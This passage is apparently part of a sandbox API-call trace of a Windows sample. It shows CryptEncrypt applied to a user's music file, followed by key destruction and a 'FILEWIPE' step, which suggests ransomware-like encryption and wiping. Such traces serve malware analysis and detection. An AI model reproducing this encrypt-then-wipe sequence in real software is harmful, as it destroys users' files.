RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.843] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.843] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.845] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x2ddd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x2de0) returned 1 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.846] CharLowerBuffW (in: lpsz="byte[11745]", cchLength=0xb | out: lpsz="byte[11745]") returned 0xb [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.846] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.847] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.847] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.847] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac89d0*, pdwDataLen=0x6ae220*=0x2ddd, dwBufLen=0x2de0 | out: pbData=0xac89d0*, pdwDataLen=0x6ae220*=0x2de0) returned 1 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.848] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.848] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.848] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.849] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.849] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.849] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.849] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.849] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.849] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.850] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.850] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.850] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.850] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.850] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.850] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.850] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0037.851] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.851] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.851] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.851] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.851] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.851] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.851] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.851] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.852] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.852] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.852] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.852] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.852] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.852] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.852] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.852] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.852] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.852] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.853] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.854] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.854] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf32dd8d0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 0x7c2240 [0037.855] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.855] CharLowerBuffW (in: lpsz="byte[11741]", cchLength=0xb | out: lpsz="byte[11741]") returned 0xb [0037.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.855] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.855] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.855] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.855] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.856] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: 